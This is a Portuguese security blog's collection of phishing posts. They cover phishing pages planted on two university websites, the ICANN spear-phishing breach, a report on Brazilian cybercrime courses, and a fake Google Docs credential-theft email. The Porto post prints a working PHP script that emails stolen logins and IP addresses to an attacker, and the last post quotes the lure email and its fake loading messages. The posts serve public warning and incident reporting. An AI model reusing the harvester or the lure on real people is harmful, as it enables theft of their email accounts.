Todos os posts tagados phishing

Universidade Nova de Lisboa aloja página de Phishing

ataque_alerta

Recentemente publiquei que a Universidade do Porto estava alojar uma página de Phishing.
Hoje deparei-me com um alerta de uma nova universidade com uma página de Phishing ao Yahoo.

Desta vez trata-se da página do Estudo Interdisciplinar de Comunidades Alto Medievais – http://eicam-iem.fcsh.unl.pt/. Este site é um projecto centrado na região de Viseu, desenvolvido no âmbito do Instituto de Estudos Medievais da FCSH/UNL. É também financiado pela Fundação Calouste Gulbenkian.

eicam-iem.fcsh.unl.pt/wetindeyhappen/Indezx.html

A página de Phishing mostra uma cópia da página de autenticação do Yahoo! onde a vítima ao enviar o seus dados, está a enviar um pedido ao script PHP alojado no servidor loja – Loginc.php que envia um email com os dados para o utilizador malicioso.

yahoo_phishing

Um pouco estranho é que a página está alojada no wix.com.

Até à data deste artigo, a página de Phishing ainda está online.

Site da Universidade do Porto aloja página de Phishing

contas_google_phishing

O site do Centro de Educação Médica do Departamento da Faculdade de Medicina da Universidade do Porto – http://cem.med.up.pt está alojar uma página que está a ser utilizada para Phishing de contas do Google.

O endereço afetado continua ativo e foi divulgado na base de dados Clean-MX.

http://cem.med.up.pt/images/banners/Domain/

Dado à possibilidade de listagens de ficheiros do servidor web, é possível descarregar o ficheiro [inserido em 17 de Fevereiro de 2015] utilizado pelo utilizador malicioso, no qual divulgo:

<?php

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Email ID: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['emailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By Lord PoPpA-----------------------------\n";

$recipient = "juwonlo7@XXXXXXXXXXX";
$subject = "TRANSACTION LOGIN";
$headers = "From: DOMAIN";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.bluehost.com/");

}
else
{
echo "ERROR! Please go back and try again.";
}
?>

De referir que o site corre Joomla! e poderá ter sido essa a porta de entrada da intrusão.
Uma cópia desta informação foi enviada ao report @cert.pt para uma possível resolução.

ICANN comprometida por “spear phishing”

ICANN Spear-Phishing

A organização Internet Corporation for Assigned Names and Numbers (ICANN) foi comprometida por uma ameaça desconhecida que permitiu acesso administrativo a sistemas internos.

Para o ataque foi usado um método de “spear phishing” que apesar de ser idêntico ao “phishing” tem a particularidade de ter métodos criados especificamente para alvos pré definidos.

O principal alvo foram os funcionários da ICANN que receberam diversos emails falsificados e mascarados de emails fidignos da própria empresa que continham um endereço para uma página onde os funcionários teriam que introduzir as suas credencias como utilizador, password e chaves das suas contas de email.

A violação de dados começou no inicio de Novembro e foi descoberta uma semana depois, relembro que a ICANN é a organização que gere o sistema global de domínios de nível superior (top-level domain)

Com esses acessos os atacantes tiveram acesso a diversos sistemas da ICANN, como Centralized Zone Data System (CZDS), ao Blog e pagina da Wiki oficial da ICANN, Governmental Advisory Committee (GAC) e à pagina de registo do Whois, bem como dados pessoais dos utilizadores.

No início deste ano já teriam sido implementadas algumas medidas de segurança, que apesar de insuficientes preveniram danos maiores.

No site oficial foi publicado uma noticia a reportar o incidente (link)

Brasil tem cursos para criminosos online

A Trend Micro divulgou recentemente um estudo muito interessante sobre o crime online no Brasil. O autor deste estudo, o brasileiro Fernando Mercês, informa que o Brasil tem cursos de formação para utilizadores maliciosos aprenderem a lançar ataques de phishing e outros tipos de fraudes online. O preço deste tipo de formação, varia entre R$ 120 e R$1500 (~37€ e ~465€).

No relatório, é possível ver que os formadores disponibilizam mesmo as ferramentas necessárias para que até os mais novatos possam lançar ataques aos utilizadores mais desatentos. Estas ferramentas, vão desde software de envio de Spam por SMS (~153€) até geradores de cliques e gostos em redes sociais (a partir de ~6€). O importante aqui é salientar a disponibilização de um variado leque de opções para utilizadores maliciosos novatos que poderão lançar ataques devastadores.

Tenta em conta que grande parte dos ataques de phishing em Portugal são realizados com origem no Brasil, é importante salientar a importância deste relatório da Trend Micro para o nosso país.

Email rouba dados de acesso

Email rouba dados de acesso

Recebi no meu email, e posteriormente mais quatro amostras, uma mensagem de um contacto real que referia que não estava a conseguir enviar-me um documento urgente por email. Para facilitar, colocou o ficheiro no Google Docs (agora Google Drive) e informava que era só necessário entrar com os dados de acesso do email para visualizar o suposto documento. Segue uma cópia integral do corpo deste email com o assunto DOCUMENTS UPLOADED:

hello,

I have been trying to send you this urgent document but was unsuccessful with attaching them to my email, maybe something with the network. I managed to upload them via Googledocs .Please https://file.google.com/ to log in with your email for secure access.

Thanks,

Basicamente, todos os remetentes desta mensagem viram a sua conta comprometida e todos os seus contactos irão receber um email desta natureza.

Este email, como veio de um contacto da agenda, entrou sem ser detectado como SPAM, aumentando assim consideravelmente o número de aberturas deste email de phishing.

Se o utilizador clicar no link que acompanha este email, irá entrar num site (provavelmente comprometido) que apresenta uma janela para entrar com os dados de acesso do Gmail, Yahoo, Hotmail ou Aol. Após o clique num destes serviços de email, o utilizador é apresentado com um formulário que requisita o respectivo email e password. Estes ultimos dados, se preenchidos, irão ser enviados para o endereço de email do utilizador malicioso.
Não existe qualquer tipo de validação da página. É apenas código Javascript que apresenta sempre a mesma sequência de mensagens:

splashmessage[0]=’VERIFYING LOGIN’
splashmessage[1]=’LOGIN ACCEPTED’
splashmessage[2]=’PROCESSING DOC’
splashmessage[3]=’…FINALIZING DOCUMENT VIEW…’
splashmessage[4]=’SERVER TOO BUSY !!!’
splashmessage[5]=’ERROR PROCESSING FILES !!!’
splashmessage[6]=’PLEASE WAIT’
splashmessage[7]=’OPENING DATA FAILED’

Após estas mensagens, o utilizador é encaminhado para o endereço: https://docs.google.com/templates?sort=rating&view=public (caso esteja autenticado no Google).

Até à data deste artigo, o link de phishing que acompanha este email não é detectado pelo VirusTotal, nem pelos antivirus online. No entanto já denuncei o link como malicioso. É uma questão de tempo para começar a ser bloqueado.

Em certos casos, foi-me relatado por um utilizador afectado, a conta do Gmail tinha o idioma em chinês e com um redirecionamento para uma conta de email parecida com a conta afectada.
As mensagens de email e contactos foram eliminados. Este ataque está afectar muitos portugueses. Convém ter atenção a este email fraudulento.

Se enviou os seus dados de acesso, deverá mudar imediatamente a sua password e verificar a informação que tinha armazenada no seu email pois poderá ter sido descarregada pelo utilizador malicioso.